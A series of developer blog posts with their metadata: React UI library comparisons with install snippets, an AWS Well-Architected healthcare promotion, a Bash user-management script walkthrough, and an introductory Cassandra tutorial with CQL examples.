In conclusion, this blog post covers the top 20 major questions that a React developer should know in 2023. The questions cover a wide range of topics, from the basics of React, its benefits and architecture, to more advanced concepts such as JSX, state and props, controlled and uncontrolled components, Redux, Higher Order Components, and more. By trying to answer each question yourself before looking at the answers, you can gain a deeper understanding of the React framework and become a better React developer.
mahadizulfiker
1,909,051
Top 5 best UI libraries to Use in your Next Project
Introduction Are you looking to speed up your web development process? A UI library might...
0
2024-07-02T14:46:33
https://strapi.io/blog/top-5-best-ui-libraries-to-use-in-your-next-project
webdev, javascript, beginners, react
## Introduction

Are you looking to speed up your web development process? A UI library might be just what you need! This article explores the top 5 modern UI libraries that can help you build stunning web applications quickly and efficiently.

A UI library is a collection of pre-designed and pre-built user interface elements (such as buttons, menus, lists, dropdowns, etc.) used to build user interfaces for a web application in a unified design style.

In a conventional web development workflow, you usually need a UI/UX designer to design the user interfaces before developing a web application. Although this is a good approach, it increases development costs and time, and not all developers can afford that. Here's where a UI library comes in. It can effectively address this issue by accelerating the web development process and ensuring a visually appealing and consistent design for your web application.

## What Makes The Best UI Libraries?

Before we determine the top 5 best UI libraries, it's essential to establish clear criteria. This ensures that our selection process is fair, objective, and accountable, instilling confidence in the validity of our list. These are the criteria we are using to make this list.

### 1. It's A UI Library

By the definition we wrote in the Introduction section, it's a UI library. Therefore, we won't include popular libraries like Bootstrap and Tailwind CSS because they are more like CSS frameworks than UI libraries.

### 2. Popularity & Community Support

Popularity and community support are significant because the life of a UI library might depend on them. More popular UI libraries have more community support. We will measure this primarily by using GitHub stars and the number of search results on Google search.

### 3. Number of Components & Features

This factor indicates the completeness of a UI library. More components & features are better.

### 4. How Easy to Use and Customize

Each UI library comes with a documentation website and a customization API. We thoroughly reviewed these resources to assess how user-friendly and adaptable the libraries are, particularly for beginners.

### 5. Accessibility & Performance

Accessibility and performance make a UI library reliable for production-grade web applications. We measured this by testing the availability of keyboard navigation, WAI-ARIA patterns, and memory consumption of the same components across the tested UI libraries.

### 6. Developer Reviews & Experience

A UI library exists to ease developer work. We measured this by our experience using all of them and developer reviews in online forums like Reddit, Stack Overflow, etc.

### 7. Updates and Development Activity

No one wants to use an outdated library. As of this post, all UI libraries in the list are actively maintained.

---

### 1. Material UI - The Most Popular UI Library

Material UI stands as the undisputed champion among UI libraries built on top of React. It brings Google's Material Design to life with a comprehensive set of components, making it a reliable choice for your projects.

When this article was written, Material UI was in version 5.15.19, with 60+ components, 92.4k GitHub stars, and almost 3k contributors. It is used by 1.2 million projects on GitHub, and the community support is huge.

#### How to use Material UI + Examples

You can install Material UI in your project by running:

```bash
npm install @mui/material @emotion/react @emotion/styled
```

After that, you can directly use Material UI components in your project:

```jsx
import * as React from 'react';
import Button from '@mui/material/Button';

export default function ButtonUsage() {
  return <Button variant="contained">Hello world</Button>;
}
```

The image below shows an example implementation of common UI components in Material UI. You can check the live demo and codes in StackBlitz.
![mui-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/material_ui_2a0bffdf0f.jpg)

[![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/mui-examples)

#### Accessibility & Performance

Material UI components follow WAI-ARIA specs and have standard keyboard navigation. They are performant, efficient, and reliable for production-grade applications. While Material UI components are efficient and reliable, they do come with a large bundle size that can potentially impact page speed. However, this can be mitigated by optimizing the bundle size, a process you can learn more about here.

#### Customization

Material UI has ThemeProvider for basic customization like color palette, dark mode, typography, and breakpoints. Material UI uses a CSS-in-JS library for styling. Every Material UI component has an `sx` prop for inline customization. You can also apply global styling to override the default style. You can visit [Material UI customization docs](https://mui.com/material-ui/customization/how-to-customize/) for more details about customization.

#### Advantages & Disadvantages

\+ Battle-tested UI library.
\+ Huge community support.
\+ Complete features.
\+ Accessible.
± Good for large projects, but overkill for small projects.
\- Material Design is overused.
\- Customization is not developer friendly.

### 2. Ant Design - An Enterprise-class React UI Library

Ant Design, an open-source design system developed by Alibaba Group for enterprise-class web applications, is known for its simplicity, cleanliness, and elegant UI design. This straightforward design approach can help developers and designers feel at ease when working with the system. It is also built on top of React.

Ant Design is on version 5.18.0 with 75 components, 90.9k GitHub stars, and 2.1k+ contributors when this article is written. It is used by around 605k projects on GitHub.
#### How to use Ant Design + Examples

You can install Ant Design by running this command:

```bash
npm install antd --save
```

Then, you can use the components in your project:

```jsx
import React from 'react';
import { DatePicker } from 'antd';

const App = () => {
  return <DatePicker />;
};

export default App;
```

The image below shows what Ant Design components look like. You can check the live demo and codes in StackBlitz.

![antd-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/ant_design_38c62c9290.jpg)

[![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/antd-examples)

#### Accessibility & Performance

Ant Design follows basic accessibility specs and supports keyboard navigation for its components. Ant Design components are designed to be clean, performant, and responsive for enterprise-class applications. Like Material UI, Ant Design uses CSS-in-JS and has a large bundle size. However, you can optimize it with [Tree-shaking](https://ant.design/docs/blog/tree-shaking).

#### Customization

Ant Design offers basic customization for theming but limited options for advanced customization. It does not provide documentation for applying a custom style; to customize it, you must override the default style with global CSS.

#### Advantages & Disadvantages

\+ Battle-tested UI library.
\+ Large community support.
\+ Comprehensive components & features.
\+ Clean and elegant design.
± Good for medium-large projects, but overkill for small projects.
\- Limited accessibility.
\- Limited customization.

### 3. Mantine - A Fully Featured React UI Library

Mantine is a React UI library that provides great user and developer experiences. It launched in 2021 and is consistently updated with a new minor release almost monthly, accelerating its growth. Although Mantine is relatively new compared to Material UI and Ant Design, it offers more complete component collections.
When this article was written, Mantine was on version 7.10.1 with 100+ components, 25.2k GitHub stars, and 531 contributors.

#### How to use Mantine + Examples

You can install Mantine by running:

```shell
npm install @mantine/core @mantine/hooks
```

You also need to install `postcss`:

```shell
npm install --save-dev postcss postcss-preset-mantine postcss-simple-vars
```

Then, create a `postcss.config.cjs` file in your project root folder:

```javascript
module.exports = {
  plugins: {
    'postcss-preset-mantine': {},
    'postcss-simple-vars': {
      variables: {
        'mantine-breakpoint-xs': '36em',
        'mantine-breakpoint-sm': '48em',
        'mantine-breakpoint-md': '62em',
        'mantine-breakpoint-lg': '75em',
        'mantine-breakpoint-xl': '88em',
      },
    },
  },
};
```

You also need to wrap your application with `MantineProvider` to be able to use Mantine components:

```jsx
import { createTheme, MantineProvider } from '@mantine/core';
import '@mantine/core/styles.css'; // core styles are required for all packages

const theme = createTheme({
  /** Put your mantine theme override here */
});

function App() {
  return (
    <MantineProvider theme={theme}>
      {/* Your app here */}
    </MantineProvider>
  );
}
```

Mantine also provides some starter templates for various frameworks. You can see more details about it in [its official documentation](https://mantine.dev/getting-started/).

The image below is a screenshot of the Mantine components implementation. You can check the live demo and codes in StackBlitz.

![mantine-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/mantine_3121f3ee78.jpg)

[![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/mantine-examples)

#### Accessibility & Performance

Mantine follows WAI-ARIA standards and implements keyboard navigation in its components. Its components are designed with attention to detail and efficiently handle micro-interactions, making them convenient for users.
Starting from version 7, Mantine uses CSS modules for styling, making it faster than CSS-in-JS-based UI libraries. However, this approach also has a drawback: `@mantine/core/styles.css` contains all the component styles, so styles for unused components are imported too, producing a larger bundle size. This problem can be solved by [manually importing individual component styles](https://mantine.dev/styles/mantine-styles/).

#### Customization

Mantine has a very developer-friendly documentation page that provides live customization for each component. You can customize Mantine components by passing new CSS modules or modifying component classes and styles through the [styles API](https://mantine.dev/styles/styles-api/).

#### Advantages & Disadvantages

\+ Complete components and custom hooks.
\+ Clean design.
\+ Highly customizable.
\+ Developer friendly.
± Good for medium-large projects, but overkill for small projects.
\- Community support is still small, but growing.
\- Bloated CSS from unused components.

### 4. Chakra UI - Simple, Modular & Accessible UI Library

Chakra UI is a simple and accessible React UI library with composable and highly customizable components. It is also very developer-friendly and easy to use for beginners.

When we wrote this article, Chakra UI's latest stable version was 2.8.2. It has 60+ components, 37k GitHub stars, 600+ contributors, and is used by more than 309,000 projects on GitHub.

#### How to use Chakra UI + Examples

You can add Chakra UI to your project by running this command:

```shell
npm i @chakra-ui/react @emotion/react @emotion/styled framer-motion
```

You also need to wrap your application root with `ChakraProvider`:

```jsx
import { ChakraProvider } from '@chakra-ui/react'

function App() {
  return (
    <ChakraProvider>
      <TheRestOfYourApplication />
    </ChakraProvider>
  )
}
```

You can go to [its official documentation](https://v2.chakra-ui.com) for more details about Chakra UI.
The following image is a screenshot of a Chakra UI basic components implementation. You can check the live demo and codes in StackBlitz.

![chakraui-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/chakra_ui_4dae103130.jpg)

[![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/chakraui-examples)

#### Accessibility & Performance

Every Chakra UI component is built with a WAI-ARIA pattern and documented keyboard navigation support. Generally, Chakra UI components are robust and performant. In Chakra UI version 2, each component can be imported individually. This ability can decrease the application bundle size, thus improving performance.

#### Customization

Chakra UI uses CSS-in-JS, offering customization at a slight performance cost. This is due to runtime style computations and className generation, which might be noticeable in performance-sensitive, large apps. However, Chakra UI is an excellent option for small to medium applications.

#### Advantages & Disadvantages

\+ Highly customizable.
\+ Easy to use & developer friendly.
\+ Good community support.
\+ Accessible & composable components.
± Good for small-medium projects.
\- Fewer components compared to other UI libraries.
\- CSS-in-JS might decrease component performance.

### 5. Shadcn UI - Beautifully Designed Components

Shadcn UI is a collection of accessible and customizable open-source UI components. Unlike other UI libraries, Shadcn is not available as an npm package. Instead, it provides a CLI tool for adding UI component code directly into your project. Shadcn is relatively new but quickly gained popularity thanks to its unlimited customization options. Shadcn can also be used as a reference for building your own UI library.

When this article was written, Shadcn had 48 components, 62.8k GitHub stars, and 191 contributors.

#### How to use Shadcn UI + Examples

Shadcn depends on Tailwind CSS for styling.
So, you need to install Tailwind CSS before installing the Shadcn CLI. To install the Shadcn CLI, you can run:

```shell
npx shadcn-ui@latest init
```

There will be a prompt for configuration options. After that, you can start adding a component's code to your project by running:

```shell
npx shadcn-ui@latest add button
```

It will copy the button component code to your component folder, where you can import and use the component:

```jsx
import { Button } from "@/components/ui/button"

export default function Home() {
  return (
    <div>
      <Button>Click me</Button>
    </div>
  )
}
```

There are some additional setups you need to do based on the framework you use for your project. They are documented in the [official installation docs](https://ui.shadcn.com/docs/installation).

The following image is a screenshot of how Shadcn components look. You can check the live demo and codes in StackBlitz.

![shadcn-examples](https://delicate-dawn-ac25646e6d.media.strapiapp.com/shadcn_104b49989e.jpg)

[![Open in StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/~/github.com/syakirurahman/shadcn-examples)

#### Accessibility & Performance

Shadcn components are built on top of [Radix UI components](https://www.radix-ui.com/) and follow WAI-ARIA authoring practices. Radix UI accessibility is tested in many modern browsers and commonly used assistive technologies. Shadcn components are also efficient and performant. The bundle size is relatively small, since you only add the components you want to use; it depends on how many components you use.

#### Customization

With access to the component code, Shadcn offers unlimited customization options. You can customize the component classes with Tailwind CSS and even add new props.

#### Advantages & Disadvantages

\+ Accessible and lightweight.
\+ Modular.
\+ Highly customizable.
\+ Clean design.
\+ Good for any project, small to large.
\- Not beginner friendly.
\- Still new; community support is still small.
## Choosing the Right Library

Even the best UI library will only fit some of your project requirements. Before using a UI library, make sure it fits with:

- Your project type and size
- Team member experience
- Your familiarity with the library
- Design compatibility with your brand/project

## Conclusion

We researched this post as much as we could to provide an accurate and accountable review, but in the end, the decision is yours; we are just giving you more insights. By reading this article, we hope you can now decide on the UI library that fits your projects.
syakirurahman
1,909,045
AWS Well-Architected Framework Review: Empowering Healthcare Industry
Technology is quintessential in the evolving field of healthcare and life sciences to elevate patient...
0
2024-07-02T14:45:09
https://dev.to/techpartner/aws-well-architected-framework-review-empowering-healthcare-industry-3hg
healthcare, aws, wellarchitected
Technology is essential in the evolving field of healthcare and life sciences to elevate patient care, automate operations, and advance medical research. It can be daunting to handle and enhance these technological systems. This is where the AWS Well-Architected Framework with a Healthcare Lens becomes extremely beneficial.

[The AWS Well-Architected Framework Review (WAFR)](https://aws.amazon.com/architecture/well-architected/?wa-lens-whitepapers.sort-by=item.additionalFields.sortDate&wa-lens-whitepapers.sort-order=desc&wa-guidance-whitepapers.sort-by=item.additionalFields.sortDate&wa-guidance-whitepapers.sort-order=desc) is a cloud infrastructure design and review methodology that helps you leverage the unique advantages of the cloud and secure, optimize, and maintain your cloud environments. The WAFR defines six pillars: **Operational Excellence, Security, Reliability, Performance Efficiency, Cost Optimization and Sustainability.** Each of these six pillars consists of design principles which are the best practices of cloud infrastructure. The six pillars are the criteria for evaluating cloud-based infrastructures and identifying areas that require enhancement.

During the execution of the Well-Architected Framework Review for healthcare companies, the "Healthcare Lens" incorporates industry-specific guidelines, design principles, and best practices customized to address the distinctive requirements of the healthcare and life sciences sector. It focuses on compliance with healthcare regulations, data security, optimizing efficacy in delivering patient care services, and managing costs. It also nurtures innovation in medical research endeavors and treatment practices.

**AWS Well-Architected Framework: Healthcare Lens**

**Operational Excellence:**

- Automate processes to reduce human error, ensure compliance, and maintain availability of critical healthcare services.
- Key points to review: continuous improvement, operational monitoring, quick issue resolution.
**Security:**

- Protect patient data with HIPAA, GDPR and other compliance frameworks, strong access controls, and encryption.
- Key points to review: multi-factor authentication, regular security assessments, updated security protocols.

**Reliability:**

- Ensure system resilience and quick recovery to minimize patient care disruption.
- Key points to review:
  - Redundancy, automated recovery, regular disaster recovery drills.
  - RPO (Recovery Point Objective): the maximum acceptable amount of data loss measured in time.
  - RTO (Recovery Time Objective): the maximum acceptable time to restore the system after a failure.

**Performance Efficiency:**

- Optimize application performance for variable workloads, especially during peak times.
- Key points to review: auto-scaling, right-sizing, performance metric reviews.

**Cost Optimization:**

- Manage cloud costs effectively to avoid resource wastage while maintaining quality patient care.
- Nearly a third of cloud spend is wasted, highlighting the need for effective cost management ([Flexera 2024 State of the Cloud Report](https://www.flexera.com/stateofthecloud)).
- Key points to review: FinOps practices, cost allocation tags, regular resource review.

**Sustainability:**

- Support climate goals by reducing the carbon footprint of cloud operations.
- Key points to review: optimize energy consumption, use energy-efficient instances, leverage renewable energy.

**Impact of the WAFR Healthcare Lens on Various Healthcare Services**

Here are some key examples where applying the Healthcare Lens can significantly enhance healthcare services:

**1. Electronic Health Record (EHR) Systems:**

- Benefits: Enhances data integrity, availability, and security while ensuring compliance with healthcare regulations like HIPAA. Improves scalability and performance to handle large volumes of patient data.

**2. Telemedicine and Remote Patient Monitoring:**

- Benefits: Increases accessibility to healthcare services, particularly in remote areas, and enables continuous health monitoring. Supports timely medical interventions and better chronic disease management.

**3. Health Information Exchanges (HIE):**

- Benefits: Facilitates secure, real-time data sharing across different healthcare providers, enhancing interoperability and coordination of patient care. Reduces duplication of tests and procedures.

**4. Clinical and Research Data Lakes:**

- Benefits: Centralizes clinical and research data, supporting advanced analytics and machine learning. Ensures data privacy and compliance, accelerating medical research and improving data-driven decision-making.

**5. Genomic Data Processing and Analysis:**

- Benefits: Provides scalable compute resources for high-throughput sequencing, ensuring secure storage and compliance. Accelerates genetic research and personalized medicine initiatives.

**6. AI/ML in Healthcare:**

- Benefits: Generative AI and machine learning are being applied to many workflows in healthcare, such as predicting health outcomes, improving patient access to care, revenue cycle operations, and provider workflows. The Healthcare Lens oversees best practices to adhere to regulatory oversight, design control obligations, and interpretability requirements.

For detailed information on these and other scenarios, refer to the [AWS documentation](https://docs.aws.amazon.com/wellarchitected/latest/healthcare-industry-lens/scenarios.html).

**The Grave Consequences of Misconfigurations in Cloud Architectures**

**1. Data Breaches:** Misconfigurations in cloud storage and database settings have led to breaches of millions of patient records, causing significant harm, particularly in the healthcare field.
According to the IBM Security '[Cost of a Data Breach](https://www.ibm.com/reports/data-breach)' report, in 2023 the average cost of a data breach in healthcare surged to $11 million, a 53% increase from 2020. This figure far exceeds the cross-industry average of $4.45 million.

**2. Compliance Violations:** Misconfigurations, such as failing to deploy cloud architectures in the correct regions, can result in violations of regulations like HIPAA and GDPR. These violations can attract substantial fines and permanently damage an organization's credibility and public image. The U.S. Department of Health and Human Services Office for Civil Rights (OCR) resolved several HIPAA violation cases with significant penalties in 2023 ([HHS.gov](https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/data/enforcement-highlights/index.html)).

**3. Disruptions in Services:** Downtime caused by improperly set up cloud resources can affect patient care, which is a crucial concern for the healthcare sector. A survey conducted by [LogicMonitor](https://www.logicmonitor.com/resource/outage-impact-survey#:~:text=96%25%20of%20global%20IT%20decision,Downtime%20is%20expensive.) revealed that 96% of participants encountered at least one cloud outage in the last three years, with an average downtime of around 7 hours.

**Deliverables of the AWS Well-Architected Framework Review**

**1. Gap Analysis Report:** A detailed report on issues in the cloud infrastructure and deviations from AWS best practices and compliance requirements.

**2. Recommendations:** Suggested actions based on their impact on the six AWS pillars, prioritized by level of risk.

**3. Roadmap to Fix Issues:** Outlines the actions needed to close the gaps, including timelines and resource requirements, while highlighting possible dependencies.

**4. Visibility on Risks:** Provides clear visibility into the risks associated with misconfigurations and non-compliance, ensuring stakeholders are fully aware of the consequences and mindful of these risks.

**5. Continuous Improvement Plan:** Establishes processes for continuous monitoring, review, and improvement of the cloud architecture.

The Well-Architected Framework Review helps healthcare and life sciences organizations identify gaps and offers a plan to address security, compliance, and operational issues in their cloud setups. In an industry where the stakes are high, proactive measures to mitigate risks and optimize cloud architectures are essential for long-term success. AWS recommends conducting Well-Architected Framework Reviews (WAFRs) regularly to ensure continued alignment of cloud architectures with best practices and business objectives. Reviews should be conducted at least annually or after significant changes to the architecture.

Here's where we come in: [Techpartner Alliance](https://www.techpartneralliance.com/) is an AWS Advanced Partner and a certified [AWS Well-Architected Review Partner](https://www.techpartneralliance.com/well-architected-review/). We are fully equipped to conduct the Well-Architected Framework Review, especially with the Healthcare Lens, for your technology infrastructure. We will partner with you on your journey to build cloud infrastructure in line with the design principles of the six pillars of the Well-Architected Framework.

Follow our [LinkedIn Page](https://www.linkedin.com/company/techpartner-alliance/) and check out our other [Blogs](https://www.techpartneralliance.com/blogs/) to stay updated on the latest tech trends and AWS Cloud. Schedule your complimentary [AWS Well-Architected Framework Assessment Now](https://forms.gle/kHJctfwhtxJiCSTH9)
arunasri
1,909,047
Technical Article: User Management Script with Enhanced Security
This article explores a Bash script designed to automate user creation and management on Linux...
0
2024-07-02T14:40:58
https://dev.to/divinechizoba/technical-article-1lkc
This article explores a Bash script designed to automate user creation and management on Linux systems. It prioritizes security by using secure file permissions and secure password storage.

**Learning More about HNG Internship**

This script can be a valuable tool for system administrators managing user accounts within organizations. To explore opportunities for such automation, consider checking out the HNG program: [HNG](https://hng.tech/).

**Script Functionality**

The script takes a user file as input, where each line specifies a username and, optionally, a comma-separated list of groups. Here's a breakdown of its key functionalities:

**Secure File Handling:**
- Log file (`LOG_FILE="/var/log/user_management.log"`): used to log actions performed by the script.
- Password file (`PASSWORD_FILE="/var/secure/user_passwords.txt"`): stores usernames and randomly generated passwords with restricted permissions (`chmod 600 $PASSWORD_FILE`).

**Password Generation Function:** The `generate_password` function generates a 16-character random password from /dev/urandom: `generate_password() { < /dev/urandom tr -dc A-Za-z0-9 | head -c 16; }`

**File Existence Check:** The script checks whether the user data file provided as an argument exists. If not, it exits with an error message: `if [ ! -f "$1" ]; then echo "User file not found!"; exit 1; fi`

**Ensuring Log and Password Files:** The script ensures that the log file and password file exist and sets appropriate permissions for security: `touch $LOG_FILE; mkdir -p $(dirname $PASSWORD_FILE); touch $PASSWORD_FILE; chmod 600 $PASSWORD_FILE`

**Reading and Processing User Data:** The script reads the user data file line by line, expecting each line to contain a username and groups separated by a semicolon (`;`).
`while IFS=';' read -r username groups; do username=$(echo "$username" | xargs); groups=$(echo "$groups" | xargs)`

**Creating Users and Groups:** For each user, the script:
- Trims any leading or trailing whitespace (the `xargs` calls above).
- Checks if the user already exists and skips it if so: `if id "$username" &>/dev/null; then echo "User $username already exists. Skipping..." | tee -a $LOG_FILE; continue; fi`
- Creates the user with a home directory and the /bin/bash shell: `useradd -m -s /bin/bash "$username"; if [ $? -ne 0 ]; then echo "Failed to create user $username" | tee -a $LOG_FILE; continue; fi`
- Creates a personal group named after the user: `groupadd "$username"`
- Processes additional groups, sanitizing them to handle special characters, checking for their existence, and creating them if necessary: `IFS=',' read -r -a group_array <<< "$groups"; for group in "${group_array[@]}"; do group=$(echo "$group" | xargs); group=$(echo "$group" | sed 's/[^a-zA-Z0-9_-]//g'); if ! getent group "$group" > /dev/null; then groupadd "$group"; fi`
- Adds the user to each specified group: `usermod -aG "$group" "$username"; done`

**Password Assignment:** Generates a random password for each user and assigns it: `password=$(generate_password); echo "$username:$password" | chpasswd`

**Logging Actions:**
- Logs the creation of each user and their assigned groups: `echo "Created user $username with groups $groups" | tee -a $LOG_FILE`
- Stores the username and generated password in the secure password file: `echo "$username:$password" >> $PASSWORD_FILE`

**Setting Permissions:** Sets appropriate permissions on the log and password files for security: `chmod 600 $PASSWORD_FILE; chmod 644 $LOG_FILE`

Here is a link to my [GitHub](https://github.com/divine299/user-management-script/blob/ca3fac59d757e6332d549f89924aaa13bc551747/create_users.sh) page containing the entire code and its documentation.

**Conclusion**

This Bash script is a powerful tool for automating user management tasks on a Linux system. By reading user data from a file, it can create users, assign them to groups, and generate secure passwords efficiently. This script can save time and reduce the risk of errors compared to manual user management.

For more information on automating tasks and improving your DevOps skills, consider exploring the [HNG Internship Program](https://hng.tech/internship) and learn how you can hire top talent from their pool of skilled interns. The HNG Internship ([Premium](https://hng.tech/premium)) is an excellent opportunity for budding developers to gain real-world experience and for companies to find talented professionals. This script is just one example of the kind of practical skills you can develop through programs like the HNG Internship. Happy automating!
divinechizoba
1,909,044
Introduction to Cassandra Database: Features, Commands, and Data Structures
Introduction Apache Cassandra is an open-source NoSQL database renowned for its...
0
2024-07-02T14:38:06
https://blog.spithacode.com/posts/87840dea-3ac0-478c-8353-c3ff91ce0f42
nosql, webdev, javascript, beginners
## Introduction

Apache Cassandra is an open-source NoSQL database renowned for its scalability and high availability without compromising performance. This article provides a detailed introduction to Cassandra, covering its main features, commands, data structures, and the underlying principles that make it an ideal choice for handling massive data workloads.

## Understanding Cassandra

### Introduction to Cassandra

Apache Cassandra is a distributed NoSQL database designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. It is designed to manage large volumes of data with high write throughput and low latency.

### History and Development

Cassandra was initially developed by Facebook for their inbox search feature and later open-sourced in 2008. The database has since evolved with contributions from a large community and various organizations, making it robust and feature-rich.

## Main Features of Cassandra

### No Single Point of Failure

Cassandra's architecture is designed to ensure there is no single point of failure. It uses a peer-to-peer distribution model, where all nodes in a cluster are equal. Data is distributed across the cluster to ensure reliability and availability.

### Peer-to-Peer Architecture

Cassandra's peer-to-peer architecture means that all nodes in the cluster communicate with each other equally. There are no master or slave nodes, which helps in achieving high availability and fault tolerance.

### Always Writable

Cassandra allows data to be written at any time, regardless of the state of the cluster. This is particularly important for applications that require high write throughput and cannot afford downtime.

### Read and Write Anywhere

Users can connect to any node in any data center to read and write data. This flexibility ensures that operations can continue seamlessly even if some nodes or data centers are down.
### Linear Performance Improvement

Cassandra's performance improves linearly with the addition of new machines. For example, doubling the number of machines approximately doubles the performance, making it highly scalable.

### User-Defined Data Replication

Data in Cassandra is replicated according to the user's needs, with strategies like SimpleStrategy and NetworkTopologyStrategy.

### Fastest NoSQL Database for Write Operations

Cassandra is known for its fast write operations, making it ideal for applications that require high write throughput.

### Consistency Levels in Cassandra

Cassandra provides three consistency levels for writing data: ONE, ALL, and QUORUM, allowing users to balance between performance and data consistency.

## Data Replication Strategies

### SimpleStrategy

In SimpleStrategy, data is replicated to the next server in a clockwise direction based on the IP address. It is straightforward and best suited for single data center deployments.

### NetworkTopologyStrategy

NetworkTopologyStrategy is used for more complex replication across multiple data centers. It allows fine-grained control over replication to ensure data durability and availability across different geographical locations.

## Consistency Levels in Detail

### Consistency Level ONE

At this level, data is written to at least one node. This provides the lowest latency but at the cost of lower consistency.

### Consistency Level ALL

This level ensures that data is written to all replica nodes. It provides the highest consistency but can result in higher latency.

### Consistency Level QUORUM

At QUORUM level, data is written to a majority of the replica nodes (N/2 + 1). This strikes a balance between consistency and latency.

#### Changing Consistency Levels

Consistency levels can be specified in the insert clause or in the Cassandra shell (cqlsh). For example:

```
cqlsh:tp2> CONSISTENCY
Current consistency level is ONE.
cqlsh:tp2> CONSISTENCY ALL
Consistency level set to ALL.
cqlsh:tp2> CONSISTENCY QUORUM
Consistency level set to QUORUM.
```

## Basic Commands in Cassandra

### Creating a Keyspace

A keyspace in Cassandra is a namespace that defines data replication on nodes. To create a keyspace:

```cql
CREATE KEYSPACE IF NOT EXISTS my_keyspace
WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor':3};
```

This command creates a keyspace named my_keyspace with a replication factor of 3 using SimpleStrategy.

### Altering a Keyspace

To alter an existing keyspace, for instance, changing its replication strategy:

```cql
ALTER KEYSPACE my_keyspace
WITH REPLICATION = {'class':'NetworkTopologyStrategy', 'datacenter1':3, 'datacenter2':2};
```

This command alters my_keyspace to use NetworkTopologyStrategy with replication factors specified for two data centers.

### Creating a Table

Tables in Cassandra are created within a keyspace. An example command:

```cql
CREATE TABLE my_table (
  id int PRIMARY KEY,
  name text,
  age int,
  city text
);
```

This command creates a table named my_table with columns id, name, age, and city.

### Inserting Data Normally

To insert data into a table:

```cql
INSERT INTO my_table (id, name, age, city)
VALUES (1, 'John Doe', 30, 'New York');
```

This inserts a row into my_table with the specified values.

### Inserting Data with JSON

Cassandra allows inserting data using JSON format:

```cql
INSERT INTO my_table JSON '{
  "id": 2,
  "name": "Jane Doe",
  "age": 25,
  "city": "Los Angeles"
}';
```

This command inserts a row into my_table using a JSON string.

### Inserting Data from a CSV File

Data can also be imported from a CSV file:

```cql
COPY my_table (id, name, age, city) FROM 'data.csv' WITH HEADER=true;
```

This command copies data from data.csv into my_table.

## Partitioning in Cassandra

### Random Partitioning

Random partitioning uses a hash value of the partition key to distribute data across nodes.
It ensures even data distribution and is the recommended approach.

### Sorted Partitioning

Sorted partitioning orders data lexicographically by partition key. It is less commonly used due to potential hotspots and uneven data distribution.

## Understanding Cassandra Terminology

### Column Family

A column family in Cassandra is similar to a table in relational databases. Each row in a column family has a unique identifier called a RowId.

### RowId

RowId uniquely identifies a row within a column family.

### Column Definition

A column is defined by its name, value, and timestamp, which is used to resolve conflicts during reads and writes.

### Table Queries and Partitions

A table in Cassandra contains multiple partitions, each identified by a partition key. Queries are typically optimized to access specific partitions.

### Map Representation of Tables

Tables can be visualized as a `Map<PartitionKey, SortedMap<Clustering, Row>>`. This structure helps in understanding the distribution and ordering of data.

## Data Types in Cassandra

### Basic Data Types

Cassandra supports basic data types such as int, varchar, text, and boolean.

### Complex Data Types

#### Sets

Sets are collections of unique values. Example:

```cql
CREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, products SET<int>);
INSERT INTO client (id, name, products) VALUES (1, 'Alice', {101, 102, 103});
UPDATE client SET products = products + {104} WHERE id = 1;
UPDATE client SET products = products - {103} WHERE id = 1;
DELETE products FROM client WHERE id = 1;
```

These commands demonstrate CRUD operations with sets.

#### Lists

Lists are ordered collections. Example:

```cql
CREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, orders LIST<int>);
INSERT INTO client (id, name, orders) VALUES (2, 'Bob', [201, 202, 203]);
UPDATE client SET orders = orders + [204] WHERE id = 2;
UPDATE client SET orders[1] = 205 WHERE id = 2;
DELETE orders[2] FROM client WHERE id = 2;
```

These commands show how to work with lists in Cassandra.

#### Maps

Maps are key-value pairs. Example:

```cql
CREATE TABLE client (id INT PRIMARY KEY, name VARCHAR, addresses MAP<int, text>);
INSERT INTO client (id, name, addresses) VALUES (3, 'Charlie', {1:'Home', 2:'Office'});
UPDATE client SET addresses = addresses + {3:'Gym'} WHERE id = 3;
UPDATE client SET addresses[2] = 'HQ' WHERE id = 3;
DELETE addresses[1] FROM client WHERE id = 3;
```

These commands illustrate CRUD operations with maps.

## FAQs about Cassandra

### What is Apache Cassandra used for?

Cassandra is used for managing large amounts of structured and unstructured data across multiple servers, ensuring high availability and fault tolerance.

### How does Cassandra ensure high availability?

Cassandra ensures high availability through its peer-to-peer architecture and data replication strategies, allowing it to continue operations even if some nodes fail.

### What are the advantages of using Cassandra over other databases?

Cassandra offers advantages such as scalability, high write throughput, no single point of failure, and flexible data modeling, making it suitable for big data applications.

### How does Cassandra handle data replication?

Cassandra handles data replication through strategies like SimpleStrategy and NetworkTopologyStrategy, replicating data across nodes to ensure durability and availability.

### What is the default consistency level in Cassandra?

The default consistency level in Cassandra is ONE, meaning data is written to at least one node.

### How can I change the consistency level in Cassandra?
Consistency levels can be changed using the CONSISTENCY command in cqlsh or specified in the insert clause of a query.

## Conclusion

### Summary of Cassandra's Features and Benefits

Cassandra stands out for its robust architecture, scalability, high availability, and performance. Its ability to handle large volumes of data with minimal latency makes it an essential tool for modern data management. By providing a peer-to-peer architecture, Cassandra ensures no single point of failure and allows for continuous read and write operations. Its data replication strategies and consistency levels offer flexibility in balancing performance and reliability. Cassandra's support for complex data types and structures further enhances its capability to meet diverse data management needs.

### Future of Cassandra in Data Management

As data continues to grow exponentially, Cassandra's capabilities will remain crucial in managing, storing, and analyzing big data. Its community-driven development ensures continuous improvement and adaptation to emerging data challenges. The future of data management will increasingly rely on scalable, reliable, and flexible databases like Cassandra, making it a valuable asset for organizations looking to leverage their data for strategic advantages.
stormsidali2001
1,885,526
A Guide to Higher-Order Functions in JavaScript
